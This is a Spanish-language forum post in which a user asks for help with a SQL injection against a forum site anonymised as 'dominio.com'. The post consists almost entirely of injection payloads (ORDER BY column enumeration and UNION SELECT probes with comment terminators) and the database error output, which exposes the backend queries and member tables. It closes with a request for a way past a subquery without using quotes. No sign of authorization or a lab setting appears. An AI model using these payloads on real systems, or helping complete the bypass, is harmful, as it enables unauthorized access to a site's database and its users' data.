Temas

[1 - Buscando el número de columnas:]

Saludos a todos,

Necesito una idea para comprender lo que está pasando en este caso de inyección sql.

1 - Buscando el número de columnas:


dominio.com/cat/1/1 order by 10--

Código (sql) [Seleccionar] Expandir


Unknown column '10' in 'order clause'

SELECT pc.cat_name AS parent_cat_name, c.cat_name AS cat_name FROM wb_forum_parent_categories pc INNER JOIN wb_forum_categories c ON (pc.id = c.parent_cat_id) WHERE c.id = 1 order by 10-- LIMIT 1


Al poner order by 2, se muestra la página normal. (2 columnas)


2 - Buscando columna/s visible/s:


dominio.com/cat/1/1 union select 1,2--

Código (sql) [Seleccionar] Expandir


Error Number: 1222

The used SELECT statements have a different number of columns

SELECT p.*, 0 AS read_id, m.member_name AS username, (SELECT m2.member_name AS last_post_username FROM wb_forum_posts p2 LEFT JOIN smf_members m2 ON (m2.id_member = p2.user_id) WHERE p2.deleted = 0 AND p2.relation_id = p.id ORDER BY p2.created DESC LIMIT 1) AS last_post_username, (SELECT p2.created AS last_post_date FROM wb_forum_posts p2 WHERE p2.deleted = 0 AND p2.relation_id = p.id ORDER BY p2.created DESC LIMIT 1) AS last_post_date FROM wb_forum_posts p LEFT JOIN smf_members m ON (m.id_member = p.user_id) WHERE p.deleted = 0 AND p.cat_id = 1 union select 1,2-- AND p.post_id = 0 GROUP BY p.id ORDER BY p.priority DESC, p.created DESC



3 - Buscando manualmente otro número de columnas:

union select 1,2,3,4,5... hasta llegar a 18.

Código (sql) [Seleccionar] Expandir


Error Number: 1222

The used SELECT statements have a different number of columns

SELECT pc.cat_name AS parent_cat_name, c.cat_name AS cat_name FROM wb_forum_parent_categories pc INNER JOIN wb_forum_categories c ON (pc.id = c.parent_cat_id) WHERE c.id = 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- LIMIT 1


¿Existe alguna forma de saltar esa sub-consulta?
Gracias.

PostData: No se pueden usar comillas ni comillas simples.